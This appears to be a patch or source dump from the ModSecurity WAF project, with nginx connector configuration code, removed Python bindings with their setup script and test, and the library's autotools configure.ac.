cln->handler = ngx_http_modsecurity_cleanup;
cln->data = ctx;
#if defined(MODSECURITY_SANITY_CHECKS) && (MODSECURITY_SANITY_CHECKS)
ctx->sanity_headers_out = ngx_array_create(r->pool, 12, sizeof(ngx_http_modsecurity_header_t));
if (ctx->sanity_headers_out == NULL) {
return NGX_CONF_ERROR;
}
#endif
return ctx;
}
char *
ngx_conf_set_rules(ngx_conf_t *cf, ngx_command_t *cmd, void *conf)
{
int res;
char *rules;
ngx_str_t *value;
const char *error;
ngx_pool_t *old_pool;
ngx_http_modsecurity_conf_t *mcf = conf;
ngx_http_modsecurity_main_conf_t *mmcf;
value = cf->args->elts;
rules = ngx_str_to_char(value[1], cf->pool);
if (rules == (char *)-1) {
return NGX_CONF_ERROR;
}
old_pool = ngx_http_modsecurity_pcre_malloc_init(cf->pool);
res = msc_rules_add(mcf->rules_set, rules, &error);
ngx_http_modsecurity_pcre_malloc_done(old_pool);
if (res < 0) {
dd("Failed to load the rules: '%s' - reason: '%s'", rules, error);
return strdup(error);
}
mmcf = ngx_http_conf_get_module_main_conf(cf, ngx_http_modsecurity_module);
mmcf->rules_inline += res;
return NGX_CONF_OK;
}
char *
ngx_conf_set_rules_file(ngx_conf_t *cf, ngx_command_t *cmd, void *conf)
{
int res;
char *rules_set;
ngx_str_t *value;
const char *error;
ngx_pool_t *old_pool;
ngx_http_modsecurity_conf_t *mcf = conf;
ngx_http_modsecurity_main_conf_t *mmcf;
value = cf->args->elts;
rules_set = ngx_str_to_char(value[1], cf->pool);
if (rules_set == (char *)-1) {
return NGX_CONF_ERROR;
}
old_pool = ngx_http_modsecurity_pcre_malloc_init(cf->pool);
res = msc_rules_add_file(mcf->rules_set, rules_set, &error);
ngx_http_modsecurity_pcre_malloc_done(old_pool);
if (res < 0) {
dd("Failed to load the rules from: '%s' - reason: '%s'", rules_set, error);
return strdup(error);
}
mmcf = ngx_http_conf_get_module_main_conf(cf, ngx_http_modsecurity_module);
mmcf->rules_file += res;
return NGX_CONF_OK;
}
char *
ngx_conf_set_rules_remote(ngx_conf_t *cf, ngx_command_t *cmd, void *conf)
{
int res;
ngx_str_t *value;
const char *error;
const char *rules_remote_key, *rules_remote_server;
ngx_pool_t *old_pool;
ngx_http_modsecurity_conf_t *mcf = conf;
ngx_http_modsecurity_main_conf_t *mmcf;
value = cf->args->elts;
rules_remote_key = ngx_str_to_char(value[1], cf->pool);
rules_remote_server = ngx_str_to_char(value[2], cf->pool);
if (rules_remote_server == (char *)-1) {
return NGX_CONF_ERROR;
}
if (rules_remote_key == (char *)-1) {
return NGX_CONF_ERROR;
}
old_pool = ngx_http_modsecurity_pcre_malloc_init(cf->pool);
res = msc_rules_add_remote(mcf->rules_set, rules_remote_key, rules_remote_server, &error);
ngx_http_modsecurity_pcre_malloc_done(old_pool);
if (res < 0) {
dd("Failed to load the rules from: '%s' - reason: '%s'", rules_remote_server, error);
return strdup(error);
}
mmcf = ngx_http_conf_get_module_main_conf(cf, ngx_http_modsecurity_module);
mmcf->rules_remote += res;
return NGX_CONF_OK;
}
char *ngx_conf_set_transaction_id(ngx_conf_t *cf, ngx_command_t *cmd, void *conf) {
ngx_str_t *value;
ngx_http_complex_value_t cv;
ngx_http_compile_complex_value_t ccv;
ngx_http_modsecurity_conf_t *mcf = conf;
value = cf->args->elts;
ngx_memzero(&ccv, sizeof(ngx_http_compile_complex_value_t));
ccv.cf = cf;
ccv.value = &value[1];
ccv.complex_value = &cv;
ccv.zero = 1;
if (ngx_http_compile_complex_value(&ccv) != NGX_OK) {
return NGX_CONF_ERROR;
}
mcf->transaction_id = ngx_palloc(cf->pool, sizeof(ngx_http_complex_value_t));
if (mcf->transaction_id == NULL) {
return NGX_CONF_ERROR;
}
*mcf->transaction_id = cv;
return NGX_CONF_OK;
}
static ngx_command_t ngx_http_modsecurity_commands[] = {
{
ngx_string("modsecurity"),
NGX_HTTP_LOC_CONF|NGX_HTTP_SRV_CONF|NGX_HTTP_MAIN_CONF|NGX_CONF_FLAG,
ngx_conf_set_flag_slot,
NGX_HTTP_LOC_CONF_OFFSET,
offsetof(ngx_http_modsecurity_conf_t, enable),
NULL
},
{
ngx_string("modsecurity_rules"),
NGX_HTTP_LOC_CONF|NGX_HTTP_SRV_CONF|NGX_HTTP_MAIN_CONF|NGX_CONF_TAKE1,
ngx_conf_set_rules,
NGX_HTTP_LOC_CONF_OFFSET,
offsetof(ngx_http_modsecurity_conf_t, enable),
NULL
},
{
ngx_string("modsecurity_rules_file"),
NGX_HTTP_LOC_CONF|NGX_HTTP_SRV_CONF|NGX_HTTP_MAIN_CONF|NGX_CONF_TAKE1,
ngx_conf_set_rules_file,
NGX_HTTP_LOC_CONF_OFFSET,
offsetof(ngx_http_modsecurity_conf_t, enable),
NULL
},
{
ngx_string("modsecurity_rules_remote"),
NGX_HTTP_LOC_CONF|NGX_HTTP_SRV_CONF|NGX_HTTP_MAIN_CONF|NGX_CONF_TAKE2,
ngx_conf_set_rules_remote,
NGX_HTTP_LOC_CONF_OFFSET,
offsetof(ngx_http_modsecurity_conf_t, enable),
NULL
},
{
ngx_string("modsecurity_transaction_id"),
NGX_HTTP_LOC_CONF|NGX_HTTP_SRV_CONF|NGX_HTTP_MAIN_CONF|NGX_CONF_1MORE,
ngx_conf_set_transaction_id,
NGX_HTTP_LOC_CONF_OFFSET,
0,
NULL
},
ngx_null_command
};
static ngx_http_module_t ngx_http_modsecurity_ctx = {
NULL, /* preconfiguration */
ngx_http_modsecurity_init, /* postconfiguration */
ngx_http_modsecurity_create_main_conf, /* create main configuration */
ngx_http_modsecurity_init_main_conf, /* init main configuration */
NULL, /* create server configuration */
NULL, /* merge server configuration */
ngx_http_modsecurity_create_conf, /* create location configuration */
ngx_http_modsecurity_merge_conf /* merge location configuration */
};
ngx_module_t ngx_http_modsecurity_module = {
NGX_MODULE_V1,
&ngx_http_modsecurity_ctx, /* module context */
ngx_http_modsecurity_commands, /* module directives */
NGX_HTTP_MODULE, /* module type */
NULL, /* init master */
NULL, /* init module */
NULL, /* init process */
NULL, /* init thread */
NULL, /* exit thread */
NULL, /* exit process */
NULL, /* exit master */
NGX_MODULE_V1_PADDING
};
static ngx_int_t
ngx_http_modsecurity_init(ngx_conf_t *cf)
{
ngx_http_handler_pt *h_rewrite;
ngx_http_handler_pt *h_access;
ngx_http_handler_pt *h_log;
ngx_http_core_main_conf_t *cmcf;
int rc = 0;
cmcf = ngx_http_conf_get_module_main_conf(cf, ngx_http_core_module);
if (cmcf == NULL)
{
dd("We are not sure how this returns, NGINX doesn't seem to think it will ever be null");
return NGX_ERROR;
}
/**
*
* Seems like we cannot do this very same thing with
* NGX_HTTP_FIND_CONFIG_PHASE. it does not seems to
* be an array. Our next option is the REWRITE.
*
* TODO: check if we can hook prior to NGX_HTTP_REWRITE_PHASE phase.
*
*/
h_rewrite = ngx_array_push(&cmcf->phases[NGX_HTTP_REWRITE_PHASE].handlers);
if (h_rewrite == NULL)
{
dd("Not able to create a new NGX_HTTP_REWRITE_PHASE handle");
return NGX_ERROR;
}
*h_rewrite = ngx_http_modsecurity_rewrite_handler;
/**
*
* Processing the request body on the access phase.
*
* TODO: check if hook into separated phases is the best thing to do.
*
*/
h_access = ngx_array_push(&cmcf->phases[NGX_HTTP_ACCESS_PHASE].handlers);
if (h_access == NULL)
{
dd("Not able to create a new NGX_HTTP_ACCESS_PHASE handle");
return NGX_ERROR;
}
*h_access = ngx_http_modsecurity_access_handler;
/**
* Process the log phase.
*
* TODO: check if the log phase happens like it happens on Apache.
* check if last phase will not hold the request.
*
*/
h_log = ngx_array_push(&cmcf->phases[NGX_HTTP_LOG_PHASE].handlers);
if (h_log == NULL)
{
dd("Not able to create a new NGX_HTTP_LOG_PHASE handle");
return NGX_ERROR;
}
*h_log = ngx_http_modsecurity_log_handler;
rc = ngx_http_modsecurity_header_filter_init();
if (rc != NGX_OK) {
return rc;
}
rc = ngx_http_modsecurity_body_filter_init();
if (rc != NGX_OK) {
return rc;
}
return NGX_OK;
}
static void *
ngx_http_modsecurity_create_main_conf(ngx_conf_t *cf)
{
ngx_pool_cleanup_t *cln;
ngx_http_modsecurity_main_conf_t *conf;
conf = (ngx_http_modsecurity_main_conf_t *) ngx_pcalloc(cf->pool,
sizeof(ngx_http_modsecurity_main_conf_t));
if (conf == NULL)
{
return NGX_CONF_ERROR;
}
/*
* set by ngx_pcalloc():
*
* conf->modsec = NULL;
* conf->pool = NULL;
* conf->rules_inline = 0;
* conf->rules_file = 0;
* conf->rules_remote = 0;
*/
cln = ngx_pool_cleanup_add(cf->pool, 0);
if (cln == NULL) {
return NGX_CONF_ERROR;
}
cln->handler = ngx_http_modsecurity_cleanup_instance;
cln->data = conf;
conf->pool = cf->pool;
/* Create our ModSecurity instance */
conf->modsec = msc_init();
if (conf->modsec == NULL)
{
dd("failed to create the ModSecurity instance");
return NGX_CONF_ERROR;
}
/* Provide our connector information to LibModSecurity */
msc_set_connector_info(conf->modsec, MODSECURITY_NGINX_WHOAMI);
msc_set_log_cb(conf->modsec, ngx_http_modsecurity_log);
dd ("main conf created at: '%p', instance is: '%p'", conf, conf->modsec);
return conf;
}
static char *
ngx_http_modsecurity_init_main_conf(ngx_conf_t *cf, void *conf)
{
ngx_http_modsecurity_main_conf_t *mmcf;
mmcf = (ngx_http_modsecurity_main_conf_t *) conf;
ngx_log_error(NGX_LOG_NOTICE, cf->log, 0,
"%s (rules loaded inline/local/remote: %ui/%ui/%ui)",
MODSECURITY_NGINX_WHOAMI, mmcf->rules_inline,
mmcf->rules_file, mmcf->rules_remote);
return NGX_CONF_OK;
}
static void *
ngx_http_modsecurity_create_conf(ngx_conf_t *cf)
{
ngx_pool_cleanup_t *cln;
ngx_http_modsecurity_conf_t *conf;
conf = (ngx_http_modsecurity_conf_t *) ngx_pcalloc(cf->pool,
sizeof(ngx_http_modsecurity_conf_t));
if (conf == NULL)
{
dd("Failed to allocate space for ModSecurity configuration");
return NGX_CONF_ERROR;
}
/*
* set by ngx_pcalloc():
*
* conf->enable = 0;
* conf->sanity_checks_enabled = 0;
* conf->rules_set = NULL;
* conf->pool = NULL;
* conf->transaction_id = NULL;
*/
conf->enable = NGX_CONF_UNSET;
conf->rules_set = msc_create_rules_set();
conf->pool = cf->pool;
conf->transaction_id = NGX_CONF_UNSET_PTR;
#if defined(MODSECURITY_SANITY_CHECKS) && (MODSECURITY_SANITY_CHECKS)
conf->sanity_checks_enabled = NGX_CONF_UNSET;
#endif
cln = ngx_pool_cleanup_add(cf->pool, 0);
if (cln == NULL) {
dd("failed to create the ModSecurity configuration cleanup");
return NGX_CONF_ERROR;
}
cln->handler = ngx_http_modsecurity_cleanup_rules;
cln->data = conf;
dd ("conf created at: '%p'", conf);
return conf;
}
static char *
ngx_http_modsecurity_merge_conf(ngx_conf_t *cf, void *parent, void *child)
{
ngx_http_modsecurity_conf_t *p = parent;
ngx_http_modsecurity_conf_t *c = child;
#if defined(MODSECURITY_DDEBUG) && (MODSECURITY_DDEBUG)
ngx_http_core_loc_conf_t *clcf = ngx_http_conf_get_module_loc_conf(cf, ngx_http_core_module);
#endif
int rules;
const char *error = NULL;
dd("merging loc config [%s] - parent: '%p' child: '%p'",
ngx_str_to_char(clcf->name, cf->pool), parent,
child);
dd(" state - parent: '%d' child: '%d'",
(int) c->enable, (int) p->enable);
ngx_conf_merge_value(c->enable, p->enable, 0);
ngx_conf_merge_ptr_value(c->transaction_id, p->transaction_id, NULL);
#if defined(MODSECURITY_SANITY_CHECKS) && (MODSECURITY_SANITY_CHECKS)
ngx_conf_merge_value(c->sanity_checks_enabled, p->sanity_checks_enabled, 0);
#endif
#if defined(MODSECURITY_DDEBUG) && (MODSECURITY_DDEBUG)
dd("PARENT RULES");
msc_rules_dump(p->rules_set);
dd("CHILD RULES");
msc_rules_dump(c->rules_set);
#endif
rules = msc_rules_merge(c->rules_set, p->rules_set, &error);
if (rules < 0) {
return strdup(error);
}
#if defined(MODSECURITY_DDEBUG) && (MODSECURITY_DDEBUG)
dd("NEW CHILD RULES");
msc_rules_dump(c->rules_set);
#endif
return NGX_CONF_OK;
}
static void
ngx_http_modsecurity_cleanup_instance(void *data)
{
ngx_pool_t *old_pool;
ngx_http_modsecurity_main_conf_t *mmcf;
mmcf = (ngx_http_modsecurity_main_conf_t *) data;
dd("deleting a main conf -- instance is: \"%p\"", mmcf->modsec);
old_pool = ngx_http_modsecurity_pcre_malloc_init(mmcf->pool);
msc_cleanup(mmcf->modsec);
ngx_http_modsecurity_pcre_malloc_done(old_pool);
}
static void
ngx_http_modsecurity_cleanup_rules(void *data)
{
ngx_pool_t *old_pool;
ngx_http_modsecurity_conf_t *mcf;
mcf = (ngx_http_modsecurity_conf_t *) data;
dd("deleting a loc conf -- RuleSet is: \"%p\"", mcf->rules_set);
old_pool = ngx_http_modsecurity_pcre_malloc_init(mcf->pool);
msc_rules_cleanup(mcf->rules_set);
ngx_http_modsecurity_pcre_malloc_done(old_pool);
}
/* vi:set ft=c ts=4 sw=4 et fdm=marker: */


@ -1,10 +0,0 @@
# Introduction
The following are a set of Swig generated Python bindings for libmodsecurity. These bindings will allow users to utilize the exposed libmodsecurity interfaces directly from python, without the use of ctypes.
# Compilation
Although these are python scripts DO NOT use setup.py to compile this. Instead, one should use the Makefile in order to compile these. This can be done by typing 'make'. Be aware that the Python development headers are required to build this package. These can be obtained on RHEL via 'dnf install python-devel'


@ -1 +0,0 @@
from modsecurity import *


@ -1,63 +0,0 @@
/*
* ModSecurity, http://www.modsecurity.org/
* Copyright (c) 2015 Trustwave Holdings, Inc. (http://www.trustwave.com/)
*
* You may not use this file except in compliance with
* the License. You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* If any of the files related to licensing are missing or if you have any
* other questions related to licensing please contact Trustwave Holdings, Inc.
* directly using the email address security@modsecurity.org.
*
* Author: Felipe "Zimmerle" Costa <fcosta at trustwave dot com>
*
*/
%module modsecurity
%include "std_string.i"
%include "std_vector.i"
%include "std_sstream.i"
%include "attribute.i"
%include "carrays.i"
%include "typemaps.i"
#%ignore RulesProperties::parserError;
%{
#include "modsecurity/intervention.h"
#include "modsecurity/transaction/variable.h"
#include "modsecurity/transaction/variables.h"
#include "modsecurity/transaction/collection.h"
#include "modsecurity/transaction/collections.h"
#include "modsecurity/transaction.h"
#include "modsecurity/debug_log.h"
#include "modsecurity/modsecurity.h"
#include "modsecurity/rules_properties.h"
#include "modsecurity/rules.h"
#include "modsecurity/rule.h"
using std::basic_string;
%}
%ignore modsecurity::RulesProperties::parserError const;
%include "modsecurity/intervention.h"
%include "modsecurity/transaction/variable.h"
%include "modsecurity/transaction/variables.h"
%include "modsecurity/transaction/collection.h"
%include "modsecurity/transaction/collections.h"
%include "modsecurity/transaction.h"
%include "modsecurity/debug_log.h"
%include "modsecurity/modsecurity.h"
%include "modsecurity/rules_properties.h"
%include "modsecurity/rules.h"
%include "modsecurity/rule.h"
%template(RuleVector) std::vector<modsecurity::Rule *>;
%template(VectorOfRuleVector) std::vector<std::vector<modsecurity::Rule *> >;
%template(StringVector) std::vector<std::string>;


@ -1,107 +0,0 @@
#!/usr/bin/env python
"""
ModSecurity, http://www.modsecurity.org/
Copyright (c) 2015 Trustwave Holdings, Inc. (http://www.trustwave.com/)
You may not use this file except in compliance with
the License. You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
If any of the files related to licensing are missing or if you have any
other questions related to licensing please contact Trustwave Holdings, Inc.
directly using the email address security@modsecurity.org.
Author: Felipe "Zimmerle" Costa <fcosta at trustwave dot com>
"""
from distutils.core import setup, Extension
import os
import sys
possible_modsecurity_dirs = [
"/usr/local/modsecurity/",
"/usr/",
"/usr/local/"
]
libraries_dir = [
"lib/",
"lib64/"
]
headers_dir = [
"include/",
"headers/",
"./"
]
def find_modsec():
for i in possible_modsecurity_dirs:
lib = None
inc = None
for j in libraries_dir:
p = os.path.join(i, j, "libmodsecurity.so")
if os.path.isfile(p) or os.path.islink(p):
lib = os.path.join(i, j)
for x in headers_dir:
p = os.path.join(i, x, os.path.join("modsecurity", "modsecurity.h"))
if os.path.isfile(p) or os.path.islink(p):
inc = os.path.join(i, x)
if inc != None and lib != None:
return (inc, lib)
return (None, None)
inc_dir, lib_dir = find_modsec()
print "*** found modsecurity at:"
print " headers: " + str(inc_dir)
print " library: " + str(lib_dir)
if inc_dir == None or lib_dir == None:
print "libModSecurity was not found in your system."
print "Make sure you have libModSecurity correctly installed in your system."
sys.exit(1)
#if os.path.isfile("modsecurity/_modsecurity_module.cc") == False:
# print "Swig generated code was not found. Please run `make' first"
# sys.exit(1)
extension_mod = Extension(
"_modsecurity", [
"modsecurity/modsecurity_wrap.cxx"
],
libraries=["modsecurity"],
swig_opts=['-Wextra', '-builtin'],
library_dirs=[lib_dir],
runtime_library_dirs=[lib_dir],
include_dirs=[inc_dir, "."],
extra_compile_args=["-std=c++11"]
)
setup(
name = "modsecurity",
description = 'Python Bindings for libModSecurity',
author = 'Felipe Zimmerle',
author_email = 'felipe@zimmerle.org',
url = 'https://github.com/SpiderLabs/ModSecurity-Python-bindings',
ext_modules = [extension_mod],
packages = ['modsecurity'],
classifiers = [
'Topic :: Security',
'Topic :: Internet :: WWW/HTTP'
]
)


@ -1,54 +0,0 @@
#!/usr/bin/env python
"""
ModSecurity, http://www.modsecurity.org/
Copyright (c) 2015 Trustwave Holdings, Inc. (http://www.trustwave.com/)
You may not use this file except in compliance with
the License. You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
If any of the files related to licensing are missing or if you have any
other questions related to licensing please contact Trustwave Holdings, Inc.
directly using the email address security@modsecurity.org.
Author: Felipe "Zimmerle" Costa <fcosta at trustwave dot com>
"""
import sys
import unittest
sys.path.append("..")
sys.path.append(".")
import modsecurity
class TestStringMethods(unittest.TestCase):
def test_version(self):
self.assertRegexpMatches(str(modsecurity.ModSecurity().whoAmI()), ".*ModSecurity.*")
def test_load_rules(self):
rules = modsecurity.Rules()
ret = rules.load('SecRule ARGS_POST|XML:/* "(\n|\r)" "id:1,deny,phase:2"')
self.assertEqual(ret, 1)
ret = rules.load("""
SecRule ARGS_POST|XML:/* "(\n|\r)" "id:1,deny,phase:2"
SecRule ARGS_POST|XML:/* "(\n|\r)" "id:2,deny,phase:2"
""")
self.assertEqual(ret, 2)
ret = rules.getRulesForPhase(3)
self.assertEqual(ret.size(), 3)
def test_load_bad_rules(self):
rules = modsecurity.Rules()
ret = rules.load('SecRule ARGS_POST|XML:/* "(\n|\r)" "deny,phase:2"')
self.assertEqual(ret, -1)
ret = rules.getParserError()
self.assertRegexpMatches(ret, "Rules must have an ID.*")
if __name__ == '__main__':
unittest.main()


@ -1,639 +0,0 @@
# ModSecurity configure.ac
# Get the hash of the last commit, to be used if it is not an
# official release.
AC_DEFUN([MSC_GIT_HASH], m4_esyscmd_s(git log -1 --format="%h" --abbrev-commit))
AC_DEFUN([MSC_MAJOR], m4_esyscmd_s(cat headers/modsecurity/modsecurity.h | grep "define MODSECURITY_MAJOR " | awk {'print $3'} | sed 's/\"//g'))
AC_DEFUN([MSC_MINOR], m4_esyscmd_s(cat headers/modsecurity/modsecurity.h | grep "define MODSECURITY_MINOR " | awk {'print $3'} | sed 's/\"//g'))
AC_DEFUN([MSC_PATCHLEVEL], m4_esyscmd_s(cat headers/modsecurity/modsecurity.h | grep "define MODSECURITY_PATCHLEVEL " | awk {'print $3'} | sed 's/\"//g'))
AC_DEFUN([MSC_TAG], m4_esyscmd_s(cat headers/modsecurity/modsecurity.h | grep "define MODSECURITY_FTAG " | awk {'print $3'} | sed 's/\"//g'))
# Version definition to be further used by AC_INIT and
# .so file naming.
m4_define([msc_version_major], [MSC_MAJOR])
m4_define([msc_version_minor], [MSC_MINOR])
m4_define([msc_version_patchlevel], [MSC_PATCHLEVEL])
m4_define([msc_version_c_plus_a], [m4_eval(msc_version_major + msc_version_minor)])
m4_define([msc_version],
[msc_version_major.msc_version_minor])
m4_define([msc_version_with_patchlevel],
[msc_version_major.msc_version_minor.msc_version_patchlevel])
m4_define([msc_version_git],
[m4_esyscmd_s(git describe)])
m4_define([msc_version_info],
[msc_version_c_plus_a:msc_version_patchlevel:msc_version_minor])
# Project Information
AC_INIT([modsecurity], [3.0], [security@modsecurity.org])
# General definitions
AC_CONFIG_MACRO_DIR([build])
AC_PREFIX_DEFAULT([/usr/local/modsecurity])
# General automake options.
AM_INIT_AUTOMAKE([-Wall -Werror foreign subdir-objects])
# Check for dependencies (C++, AR, Lex, Yacc and Make)
AC_PROG_CXX
AM_PROG_AR
AC_PROG_MAKE_SET
PKG_PROG_PKG_CONFIG
# Check if the compiler is c++11 compatible.
# AX_CXX_COMPILE_STDCXX_11(,mandatory)
# Check for libinjection
if ! test -f "${srcdir}/others/libinjection/src/libinjection_html5.c"; then
AC_MSG_ERROR([\
libInjection was not found within ModSecurity source directory.
libInjection code is available as part of ModSecurity source code in a format
of a git-submodule. git-submodule allow us to specify the correct version of
libInjection and still uses the libInjection repository to download it.
You can download libInjection using git:
$ git submodule init
$ git submodule update
])
fi
# Libinjection version
AC_DEFUN([LIBINJECTION_VERSION], m4_esyscmd_s(cd "others/libinjection" && git describe && cd ../..))
# SecLang test version
AC_DEFUN([SECLANG_TEST_VERSION], m4_esyscmd_s(cd "test/test-cases/secrules-language-tests" && git log -1 --format="%h" --abbrev-commit && cd ../../..))
# Check for yajl
PROG_YAJL
AM_CONDITIONAL([YAJL_VERSION], [test "$YAJL_VERSION" != ""])
# Check for LibGeoIP
PROG_GEOIP
AM_CONDITIONAL([GEOIP_CFLAGS], [test "GEOIP_CFLAGS" != ""])
# Check for MaxMind
PROG_MAXMIND
AM_CONDITIONAL([MAXMIND_CFLAGS], [test "MAXMIND_CFLAGS" != ""])
# Check for LMDB
PROG_LMDB
AM_CONDITIONAL([LMDB_CFLAGS], [test "LMDB_CFLAGS" != ""])
# Check for SSDEEP
CHECK_SSDEEP
AM_CONDITIONAL([SSDEEP_CFLAGS], [test "SSDEEP_CFLAGS" != ""])
# Check for LUA
CHECK_LUA
AM_CONDITIONAL([LUA_CFLAGS], [test "LUA_CFLAGS" != ""])
#
# Check for curl
#
CHECK_CURL
if ! test -z "${CURL_VERSION}"; then
AC_DEFINE([MSC_WITH_CURL], [1], [Define if libcurl is available])
fi
#
# Check for LibXML
#
CHECK_LIBXML2
#
# Check for libpcre
#
CHECK_PCRE
#
# Check for pcre2
#
PROG_PCRE2
AM_CONDITIONAL([PCRE2_CFLAGS], [test "PCRE2_CFLAGS" != ""])
# Checks for header files.
AC_HEADER_STDC
AC_CHECK_HEADERS([string])
AC_CHECK_HEADERS([iostream])
AC_CHECK_HEADERS([sys/utsname.h])
# ??
LT_INIT([dlopen])
# Identify platform
AC_CANONICAL_HOST
case $host in
*-*-aix*)
echo "Checking platform... Identified as AIX"
AC_DEFINE([AIX], [1], [Define if the operating system is AIX])
PLATFORM="AIX"
;;
*-*-hpux*)
echo "Checking platform... Identified as HPUX"
AC_DEFINE([HPUX], [1], [Define if the operating system is HPUX])
PLATFORM="HPUX"
;;
*-*-darwin*)
echo "Checking platform... Identified as Macintosh OS X"
AC_DEFINE([MACOSX], [1], [Define if the operating system is Macintosh OSX])
PLATFORM="MacOSX"
;;
*-*-linux* | *-*uclinux*)
echo "Checking platform... Identified as Linux"
AC_DEFINE([LINUX], [1], [Define if the operating system is LINUX])
PLATFORM="Linux"
;;
*-*-solaris*)
echo "Checking platform... Identified as Solaris"
AC_DEFINE([SOLARIS], [1], [Define if the operating system is SOLARIS])
PLATFORM="Solaris"
;;
*-*-freebsd*)
echo "Checking platform... Identified as FreeBSD"
AC_DEFINE([FREEBSD], [1], [Define if the operating system is FREEBSD])
PLATFORM="FreeBSD"
;;
*-*-netbsd*)
echo "Checking platform... Identified as NetBSD"
AC_DEFINE([NETBSD], [1], [Define if the operating system is NETBSD])
PLATFORM="NetBSD"
;;
*-*-openbsd*)
echo "Checking platform... Identified as OpenBSD"
AC_DEFINE([OPENBSD], [1], [Define if the operating system is OPENBSD])
PLATFORM="OpenBSD"
;;
*-*-kfreebsd*)
echo "Checking platform... Identified as kFreeBSD, treating as linux"
AC_DEFINE([FREEBSD], [1], [Define if the operating system is FREEBSD])
PLATFORM="kFreeBSD"
;;
*-*-dragonfly*)
echo "Checking platform... Identified as DragonFlyBSD, treating as linux"
AC_DEFINE([DRAGONFLY], [1], [Define if the operating system is DRAGONFLY])
PLATFORM="DragonFly"
;;
*-*-gnu*.*)
echo "Checking platform... Identified as HURD, treating as linux"
AC_DEFINE([LINUX], [1], [Define if the operating system is LINUX])
PLATFORM="HURD"
;;
*)
echo "Unknown CANONICAL_HOST $host"
exit 1
;;
esac
# Variables to be used inside the Makefile.am files.
MSC_BASE_DIR=`pwd`
AC_SUBST([MSC_BASE_DIR])
MSC_VERSION_INFO=msc_version_info
AC_SUBST([MSC_VERSION_INFO])
MSC_VERSION_WITH_PATCHLEVEL=msc_version_with_patchlevel
AC_SUBST([MSC_VERSION_WITH_PATCHLEVEL])
MSC_VERSION=msc_version
AC_SUBST([MSC_VERSION])
MSC_GIT_VERSION=msc_version_git
AC_SUBST([MSC_GIT_VERSION])
AC_ARG_ENABLE(debug-logs,
[AS_HELP_STRING([--disable-debug-logs],[Turn off the SecDebugLog feature])],
[case "${enableval}" in
yes) debugLogs=true ;;
no) debugLogs=false ;;
*) AC_MSG_ERROR(bad value ${enableval} for --enable-debug-logs) ;;
esac],
[debugLogs=true]
)
if test "$debugLogs" != "true"; then
MODSEC_NO_LOGS="-DNO_LOGS=1"
AC_SUBST(MODSEC_NO_LOGS)
fi
# Fuzzer
AC_ARG_ENABLE(afl-fuzz,
[AS_HELP_STRING([--enable-afl-fuzz],[Turn on the afl fuzzer compilation utilities])],
[case "${enableval}" in
yes) aflFuzzer=true ;;
no) aflFuzzer=false ;;
*) AC_MSG_ERROR(bad value ${enableval} for --enable-afl-fuzz) ;;
esac],
[aflFuzzer=false]
)
# Examples
AC_ARG_ENABLE(examples,
[AS_HELP_STRING([--enable-examples],[Turn on the examples compilation (default option)])],
[case "${enableval}" in
yes) buildExamples=true ;;
no) buildExamples=false ;;
*) AC_MSG_ERROR(bad value ${enableval} for --enable-examples) ;;
esac],
[buildExamples=true]
)
# Parser
AC_ARG_ENABLE(parser-generation,
[AS_HELP_STRING([--enable-parser-generation],[Enables parser generation during the build])],
[case "${enableval}" in
yes) buildParser=true ;;
no) buildParser=false ;;
*) AC_MSG_ERROR(bad value ${enableval} for --enable-parser-generation) ;;
esac],
[buildParser=false]
)
# Mutex
AC_ARG_ENABLE(mutex-on-pm,
[AS_HELP_STRING([--enable-mutex-on-pm],[Treats pm operations as a critical section])],
[case "${enableval}" in
yes) mutexPm=true ;;
no) mutexPm=false ;;
*) AC_MSG_ERROR(bad value ${enableval} for --enable-mutex-on-pm) ;;
esac],
[mutexPm=false]
)
if test "$mutexPm" == "true"; then
MODSEC_MUTEX_ON_PM="-DMUTEX_ON_PM=1"
AC_SUBST(MODSEC_MUTEX_ON_PM)
fi
if test $buildParser = true; then
AC_PROG_YACC
AC_PROG_LEX
AC_PATH_PROG([FLEX], [flex])
test "x$FLEX" = "x" && AC_MSG_ERROR([flex is needed to build ModSecurity])
AC_PATH_PROG([BISON], [bison])
test "x$BISON" = "x" && AC_MSG_ERROR([bison is needed to build ModSecurity])
AC_PATH_PROG([YACC_INST], $YACC)
if test ! -f "$srcdir/gram.c"; then
if test -z "$YACC_INST"; then
AC_MSG_ERROR([yacc not found - unable to compile ModSecurity])
fi
fi
fi
# Decide if we want to build the tests or not.
# buildTestUtilities=false
# if test "x$YAJL_FOUND" = "x1"; then
# Regression tests will not be able to run without the logging support.
# But we still have the unit tests.
# if test "$debugLogs" = "true"; then
# buildTestUtilities=true
# fi
# fi
AM_CONDITIONAL([TEST_UTILITIES], [test $buildTestUtilities = true])
if test $buildTestUtilities = true; then
if test $debugLogs = true; then
if test -f ./test/test-list.sh; then
TEST_CASES=`./test/test-list.sh`
fi
fi
fi
AM_CONDITIONAL([EXAMPLES], [test $buildExamples = true])
AM_CONDITIONAL([BUILD_PARSER], [test $buildParser = true])
AM_CONDITIONAL([USE_MUTEX_ON_PM], [test $mutexPm = true])
# General link options
if test "$PLATFORM" != "MacOSX" -a "$PLATFORM" != "OpenBSD"; then
GLOBAL_LDADD="-lrt "
fi
if test "$aflFuzzer" == "true"; then
FUZZ_CPPCFLAGS="-fsanitize=address -fsanitize-coverage=4 "
GLOBAL_LDADD="$GLOBAL_LDADD -fsanitize=address "
GLOBAL_CPPFLAGS="$GLOBAL_CPPFLAGS $FUZZ_CPPCFLAGS"
$buildExamples = false
fi
AC_SUBST(GLOBAL_LDADD)
AC_SUBST(GLOBAL_CPPFLAGS)
AM_CONDITIONAL([AFL_FUZZER], [test $aflFuzzer = true])
GLOBAL_CFLAGS=""
AC_SUBST(GLOBAL_CFLAGS)
# Files to be generated via autotools.
AC_CONFIG_FILES([\
modsecurity.pc \
Makefile \
doc/Makefile \
src/Makefile \
others/Makefile \
tools/Makefile \
tools/rules-check/Makefile
])
AM_COND_IF([TEST_UTILITIES],
[AC_CONFIG_FILES([test/Makefile test/benchmark/Makefile])])
AM_COND_IF([EXAMPLES],
[AC_CONFIG_FILES([ \
examples/Makefile \
examples/simple_example_using_c/Makefile \
examples/multiprocess_c/Makefile \
examples/reading_logs_with_offset/Makefile \
examples/reading_logs_via_rule_message/Makefile \
examples/using_bodies_in_chunks/Makefile \
])])
AM_COND_IF([AFL_FUZZER],
[AC_CONFIG_FILES([test/fuzzer/Makefile])])
AM_COND_IF([BUILD_PARSER],
[AC_CONFIG_FILES([src/parser/Makefile])])
